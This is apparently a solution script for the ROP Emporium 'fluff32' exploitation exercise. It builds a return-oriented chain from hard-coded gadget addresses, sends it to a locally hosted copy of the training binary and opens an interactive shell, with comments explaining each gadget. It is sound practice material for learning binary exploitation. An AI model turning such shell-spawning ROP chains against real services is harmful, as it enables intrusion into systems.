rop emporium fluff32
from pwn import *

# ROP Emporium "fluff32" (32-bit training binary): assemble the return-oriented
# chain and deliver it to a locally hosted instance of the challenge service.
# Every gadget address below is specific to this particular binary build; the
# trailing comment on each entry is the gadget's disassembly, as in the write-up.
binary = ELF("./fluff32")

# Padding up to the saved return address, followed by the chain itself.  Each
# pop in a gadget consumes the next 4-byte entry that follows it on the stack.
chain = [
    "JUNK" * 11,
    p32(0x080483e1),             # pop ebx ; ret
    p32(binary.plt['system']),
    p32(0x08048671),             # xor edx, edx ; pop esi ; mov ebp, 0xcafebabe ; ret
    "JUNK",                      # taken by the pop esi above
    p32(0x0804867b),             # xor edx, ebx ; pop ebp ; mov edi, 0xdeadbabe ; ret
    "\x00sh\x00",                # taken by the pop ebp above
    p32(0x080488b9),             # adc al, 0x41 ; ret
    p32(0x0804856c),             # sub esp, 0x14 ; push eax ; call edx
    "JUNK",
]
payload = "".join(chain)

conn = remote("127.0.0.1", 5000)
# Blocks on stdin before anything is sent -- presumably a pause to attach a
# debugger to the service; confirm with the author.
raw_input()
conn.recvuntil("> ")
conn.sendline(payload)
conn.interactive()